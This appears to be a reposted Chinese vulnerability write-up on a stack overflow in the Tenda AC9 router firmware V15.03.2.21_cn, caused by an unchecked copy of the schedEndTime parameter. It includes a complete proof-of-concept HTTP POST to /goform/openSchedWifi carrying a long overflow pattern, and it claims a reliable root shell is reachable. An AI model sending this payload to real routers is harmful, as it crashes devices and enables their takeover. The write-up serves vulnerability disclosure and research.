CTF导航 CTF导航

腾达AC9 V15.03.2.21_cn栈溢出

IoT 2年前 (2022) admin
816 0 0

点击上方蓝字“Ots安全”一起玩耍

概述

  • 厂家网站信息:https://www.tenda.com.cn/profile/contact.html
  • 固件下载地址:https ://www.tenda.com.cn/download/default.html

1. 受影响的版本

腾达AC9 V15.03.2.21_cn栈溢出

图1为路由器最新固件Ba

 

漏洞详情

函数开始时将schedendtime参数对应的内容传递给V20,然后V20直接复制到PTR+10的栈中。没有大小检查,所以存在栈溢出漏洞

腾达AC9 V15.03.2.21_cn栈溢出

腾达AC9 V15.03.2.21_cn栈溢出

腾达AC9 V15.03.2.21_cn栈溢出

反复出现的漏洞和 POC

为了重现漏洞,可以遵循以下步骤:

  • 使用胖子模拟固件V15.03.2.21_cn
  • 使用以下 POC 攻击进行攻击

    POST /goform/openSchedWifi HTTP/1.1
    Host: 192.168.11.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1602
    Origin: http://192.168.11.1
    Connection: close
    Referer: http://192.168.11.1/wifi_time.html?random=0.20002645587866297&
    Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcnbf1qw

    schedWifiEnable=1&schedStartTime=00%3A00&schedEndTime=01aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

复现结果如下:

腾达AC9 V15.03.2.21_cn栈溢出

图2 POC攻击效果

最后可以写exp,可以达到很稳定的获取root shell的效果

腾达AC9 V15.03.2.21_cn栈溢出

腾达AC9 V15.03.2.21_cn栈溢出

原文始发于微信公众号(Ots安全):腾达AC9 V15.03.2.21_cn栈溢出

版权声明:admin 发表于 2022年3月9日 上午8:51。
转载请注明:腾达AC9 V15.03.2.21_cn栈溢出 | CTF导航

相关文章

Route to Safety: Navigating Router Pitfalls
admin
27
某摄像头存在通用未授权命令执行漏洞
admin
888
【技术分享】对安全即时通讯软件的流量分析攻击(下)
admin
468
军事卫星通信对抗体系详解
admin
499
浅析路由器WEB服务架构(二)
admin
732
Your printer is not your printer ! – Hacking Printers at Pwn2Own Part II
admin
35

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Hacking into colgate smart tooth brush for fun!
0
【BlackHat 2024】SystemUI As EvilPiP: 针对现代移动设备的劫持攻击
0
迅捷PoE*AC路由一体机FR100P-AC固件提取研究
0
路灯频率?自由控制路灯?
0
TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389
0
西湖论剑2024 IOT赛后复盘及mqtt rce详解
0
Hunting for Unauthenticated n-days in Asus Routers
0
Palo Alto CVE-2024-3400 漏洞分析
0
原创 | CVE-2024-21762 FortiOS内存越界写导致RCE漏洞分析
0
手把手玩转路由器漏洞挖掘系列-WIFI安全威胁
0